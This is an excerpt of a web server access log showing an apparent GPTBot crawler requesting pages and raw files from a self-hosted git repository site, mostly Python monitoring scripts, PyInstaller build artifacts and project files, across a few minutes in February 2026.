-[17/Feb/2026:15:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:15:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:15:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:15:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 1858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:15:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 1858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:15:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:15:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12760] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" -[17/Feb/2026:15:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 31618] [Gzip 13.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:15:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 13898] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:15:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 21394] [Gzip 10.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:15:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 15000] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:15:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 10898] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:15:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj" [Client 74.7.227.38] [Length 32381] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" -[17/Feb/2026:15:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11757] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" -[17/Feb/2026:15:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostcomplete&state=all" [Client 74.7.227.38] [Length 8492] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=mostcomplete&state=open" -[17/Feb/2026:15:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 10865] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" -[17/Feb/2026:15:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 11979] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:15:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16543] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" -[17/Feb/2026:15:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 39650] [Gzip 25.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:15:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 9923] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:15:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 9918] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:15:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 14062] [Gzip 8.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:15:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 5643848] [Gzip 11.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:15:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:15:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" -[17/Feb/2026:15:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 15310] [Gzip 9.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:15:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 9919] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:15:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 9917] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:15:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 1822591] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:15:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 6319] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:15:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 24860] [Gzip 20.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:15:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 48601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:15:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 23750] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:15:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 4663] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:15:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" -[17/Feb/2026:15:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:15:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:15:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:15:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py?display=source" [Client 74.7.227.38] [Length 17008] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:15:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" -[17/Feb/2026:15:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py?display=source" [Client 74.7.227.38] [Length 17009] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:15:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:15:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" -[17/Feb/2026:15:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:15:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12013] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:15:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fassetpilot.ico" [Client 74.7.227.38] [Length 21540] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" -[17/Feb/2026:15:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibwinpthread-1.dll" [Client 74.7.227.38] [Length 23740] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:15:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2ffiles.zip" [Client 74.7.227.38] [Length 19737] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" -[17/Feb/2026:15:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2finstall.sh" [Client 74.7.227.38] [Length 25003] [Gzip 5.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" -[17/Feb/2026:15:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fAssetPilot.exe" [Client 74.7.227.38] [Length 20800] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" -[17/Feb/2026:15:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr 